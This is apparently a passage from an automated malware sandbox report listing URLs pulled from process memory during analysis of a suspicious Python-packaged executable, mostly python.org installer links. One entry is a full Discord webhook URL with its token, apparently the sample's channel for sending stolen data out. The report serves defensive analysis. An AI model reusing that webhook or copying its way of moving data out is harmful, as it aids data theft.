      https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msi~)Ctmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://appsyndication.org/2006/appsynapplicationc:tmpaf99aaqq.exe, 00000008.00000000.1849984571.00000000000EB000.00000002.00000001.01000000.0000001B.sdmp, tmpaf99aaqq.exe, 00000009.00000000.1852928969.000000000089B000.00000002.00000001.01000000.0000001D.sdmp, python-3.11.0-amd64.exe, 0000000A.00000000.1866271426.000000000009B000.00000002.00000001.01000000.00000021.sdmp, python-3.11.0-amd64.exe, 00000017.00000000.2117506840.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000018.00000000.2120418916.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000019.00000000.2123701363.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000000.2198842671.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000002.2219594362.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001B.00000000.2202150381.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001C.00000000.2209475341.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001F.00000000.2220206160.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpfalseunknown
        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1690196252.0000029365943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1690196252.000002936580D000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://www.python.org/ftp/python/3.11.0/amd64/lib_pdb.msiApython-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2121692854.00000000009DB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://www.python.org/ftp/python/3.11.0/amd64/core_pdb.msib~python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://www.youtube.com/watch?v=QB7ACr7pUuE3Af7PybsUi.exe, 00000003.00000003.1855816456.000001EC89935000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856655752.000001EC89996000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855667301.000001EC898D2000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1854485559.000001EC896F1000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855155972.000001EC8981B000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856013049.000001EC899D0000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856940856.000001EC899AA000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855919539.000001EC89970000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855535432.000001EC89895000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1362365322.000001EC89B35000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855365547.000001EC89858000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://www.python.org/ftp/python/3.11.0/amd64/exe_d.msiSpython-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009D2000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://www.python.org/ftp/python/3.11.0/amd64/tcltk_d.msi.tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1651080578.0000029355791000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://discord.com/api/webhooks/1266714407531057152/kGUAi8nU7KWK3s1rHPYHNujlEgOGwUolVWZOn2iBZWohl2W3Af7PybsUi.exe, 00000003.00000003.1866680280.000001EC88A12000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1857112889.000001EC88A07000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856686030.000001EC88A06000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://www.python.org/ftp/python/3.11.0/amd64/test_d.msitmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135710147.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2124156110.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2130908241.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133299039.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2120636048.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133558161.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2124870266.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119494105.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119794834.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2198030648.00000000013F1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1651080578.00000293559B8000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access3Af7PybsUi.exe, 00000003.00000003.1353135872.000001EC83661000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1354389864.000001EC83792000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC8378C000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC83661000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353094622.000001EC837E7000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1352551050.000001EC837A0000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855025804.000001EC8374C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://www.python.org/ftp/python/3.11.0/amd64/dev_d.msiApython-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2121692854.00000000009DB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1651080578.00000293559B8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          https://www.python.org/ftp/python/3.11.0/amd64/python-3.11.0-amd64.exe, 0000001C.00000003.2336222959.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msiUpython-3.11.0-amd64.exe, 00000017.00000002.2135710147.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2130908241.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133299039.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2120636048.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133558161.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119494105.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119794834.00000000013B0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://github.com/python/cpython/issues/86361.3Af7PybsUi.exe, 00000003.00000003.1343896449.000001EC83064000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1344920702.000001EC8305A000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1341884374.000001EC83094000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1341565116.000001EC83094000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://www.python.org/ftp/python/3.11.0/amd64/lib_d.msib~python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msiXpython-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://contoso.com/Iconpowershell.exe, 00000004.00000002.1690196252.000002936580D000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz3Af7PybsUi.exe, 00000003.00000003.1867200804.000001EC836DD000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1354329613.000001EC841C4000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC836DD000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://www.python.powershell.exe, 00000004.00000002.1651080578.00000293573E4000.00000004.00000800.00020000.00000000.sdmptrue
            unknown
            https://www.python.org/ftp/python/3.11.0/amd64/dev_d.msiPpython-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2121692854.00000000009DB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://www.python.org/ftp/python/3.11.0/amd64/core_d.msidpython-3.11.0-amd64.exe, 0000001F.00000003.2650221167.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2222164091.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://www.python.org/ftp/python/3.11.0/amd64/ucrt.msiy~python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.2041383827.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.2039788578.0000000000C7E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://www.python.org/ftp/python/3.11.0/amd64/core_pdb.msitmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1857214225.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856831735.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856053142.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1857500628.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855774814.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1857792733.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135710147.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2127920907.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2130908241.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133299039.00000000013B1000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://www.python.org/ftp/python/3.11.0/amd64/ucrt.msidpython-3.11.0-amd64.exe, 0000001F.00000003.2650221167.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2222164091.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://www.python.org/ftp/python/3.11.0/amd64/core_d.msiUpython-3.11.0-amd64.exe, 00000017.00000002.2135710147.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2130908241.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133299039.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2120636048.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133558161.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119494105.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119794834.00000000013B0000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msidpython-3.11.0-amd64.exe, 0000001C.00000003.2292795037.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2299721736.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2303450903.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2332188002.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2310594845.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2323651297.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2319843843.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2326738566.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2215485922.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2215847068.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2295838869.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2327529754.00000000007B2000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1651080578.00000293559B8000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      https://docs.python.org/3/library/multiprocessing.html3Af7PybsUi.exe, 00000003.00000003.1867200804.000001EC836DD000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353135872.000001EC836DD000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC836DD000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://g.live.com/odclientsettings/Prod1C:svchost.exe, 00000012.00000003.2000977226.0000020614C59000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msitmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2124156110.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2124870266.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2121692854.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2198030648.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2201291201.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2132930857.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2200451190.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2196483695.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2130912403.00000000013F1000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://wixtoolset.org/schemas/thmutil/2010(python-3.11.0-amd64.exe, 00000019.00000003.2204657211.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2334469546.0000000002C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://www.python.org/ftp/python/3.11.0/amd64/core_d.msiEpython-3.11.0-amd64.exe, 00000017.00000002.2135710147.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2130908241.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133299039.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2120636048.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133558161.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119494105.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119794834.00000000013B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://www.python.org/ftp/python/3.11.0/amd64/exe_pdb.msidpython-3.11.0-amd64.exe, 0000001F.00000003.2650221167.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2222164091.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://www.python.org/ftp/python/3.11.0/amd64/exe_d.msitmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135710147.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2127920907.0000000003B4A000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2130908241.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133299039.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2125700452.0000000003B4B000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2120636048.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133558161.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119494105.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119794834.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2198030648.000000000140C000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2198030648.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2201291201.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2196956584.000000000140C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.python.org/ftp/python/3.11.0/amd64/ucrt.msib~python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://setuptools.pypa.io/en/latest/pkg_resources.html3Af7PybsUi.exe, 00000003.00000003.1353094622.000001EC837E7000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1352551050.000001EC837A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://packaging.python.org/specifications/entry-points/3Af7PybsUi.exe, 00000003.00000003.1343550316.000001EC834FA000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1343550316.000001EC83535000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.python.org/ftp/python/3.11.0/amd64/ucrt.msiApython-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.python.org/ftp/python/3.11.0/amd64/core_d.msitmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1857214225.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856831735.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856053142.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1857500628.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 